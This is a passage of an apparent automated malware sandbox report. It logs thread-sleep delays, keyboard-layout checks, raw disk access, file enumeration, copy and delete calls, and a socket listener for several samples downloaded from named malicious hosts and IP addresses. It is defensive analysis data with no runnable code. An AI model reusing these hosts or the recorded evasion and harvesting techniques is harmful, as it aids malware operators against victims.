Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -592488s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -592313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -592157s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -592032s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -591904s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -591795s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -591685s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -591578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -591468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -591360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -591242s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -591140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -591030s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -590917s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -590813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -590647s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -590391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -590265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -590153s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -590043s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -589936s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -589821s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -589719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -589610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -589485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -589360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -589236s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -589100s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -588978s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -588856s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -588750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -599663s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -599435s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -599312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -599202s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -599036s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -598773s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -598640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -598528s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -598417s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -598297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -598185s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -598063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -597938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -597813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -597702s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -597581s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -597457s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -597216s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -597094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -596982s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -596473s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -596328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -596016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -595809s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -595688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -595577s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -595320s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -595200s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -595085s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -594966s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -594844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -594702s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -594464s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -594348s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -594161s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -594046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -593933s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -593823s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -593716s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -593490s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -592860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -592669s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -592546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -592410s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -592286s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -592171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -592062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -591924s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -591796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -591653s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -591514s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -591375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -591230s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -591105s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -590989s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -590874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -590765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -590566s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -589860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -589610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -589360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -589094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -588863s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -588641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -588453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -588157s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -587994s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -587625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -586860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -586532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -586328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe TID: 7688	Thread sleep time: -586032s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7196	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7820	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe TID: 7424	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\sysvplervcs.exe TID: 7876	Thread sleep time: -40000s >= -30000s
Source: C:\Users\user\sysvplervcs.exe TID: 4856	Thread sleep count: 163 > 30
Source: C:\Users\user\sysvplervcs.exe TID: 4856	Thread sleep time: -326000s >= -30000s
Source: C:\Users\user\sysvplervcs.exe TID: 7368	Thread sleep time: -158340s >= -30000s
Source: C:\Users\user\sysvplervcs.exe TID: 7116	Thread sleep count: 721 > 30
Source: C:\Users\user\sysvplervcs.exe TID: 7876	Thread sleep count: 4826 > 30
Source: C:\Users\user\sysvplervcs.exe TID: 7368	Thread sleep time: -111005s >= -30000s
Source: C:\Users\user\sysvplervcs.exe TID: 7368	Thread sleep time: -1800000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332	Thread sleep count: 6508 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7332	Thread sleep count: 449 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2212	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe TID: 3608	Thread sleep time: -54972s >= -30000s
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe TID: 7312	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 8_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh

8_2_00410DDB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Code function: 4_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	4_2_004068E0
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Code function: 4_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,	4_2_004067A0
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	Code function: 5_2_00EF74AB LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExW,	5_2_00EF74AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	8_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	8_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	8_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	8_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	8_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	8_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	8_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	8_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	8_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	8_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 8_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	8_2_0040CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 8_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

8_2_00415142

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe

Code function: 4_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,

4_2_00402020

Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 599282	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 599157	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 599032	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 598838	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 598725	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 598605	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 598499	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 598388	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 598281	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 598157	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 598044	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 597862	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 597604	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 597477	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 597017	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 596678	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 595891	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 595657	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 594782	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 594407	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 594270	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 594136	Jump to behavior
